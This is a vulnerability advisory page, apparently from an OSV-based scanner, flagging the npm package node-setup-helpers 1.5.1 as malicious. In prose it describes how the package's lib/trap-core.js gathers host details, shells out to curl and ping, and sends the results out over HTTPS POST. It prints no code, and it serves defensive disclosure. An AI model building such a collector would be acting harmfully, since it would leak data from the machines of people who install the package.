node-setup-helpers @1.5.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4280
Ecosystem
npm
Summary
The package's lib/trap-core.js combines host enumeration (os.hostname(), os.platform()), filesystem reads (fs.existsSync against multiple paths), child_process invocations (with curl and ping observable in the file), and HTTPS POST calls that include a 'hostname:' field in the request body — the canonical shape of a system-information beacon that gathers host identity and shells out to OS commands, then exfiltrates the results over HTTPS. Multiple POST sites (lines 385, 411, 466, 548, 549) and repeated child_process imports across the file indicate a deliberate, large surface for collection and outbound transmission rather than incidental utility code. Installing this package places this collector in the dependency graph; any code path that reaches lib/trap-core.js will leak host details and command output to a remote endpoint.
Source: amazon-inspector (626e815912fa24995ad58e18c495b1c6bd70987f9970b6262374f292e3c0d6ed)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.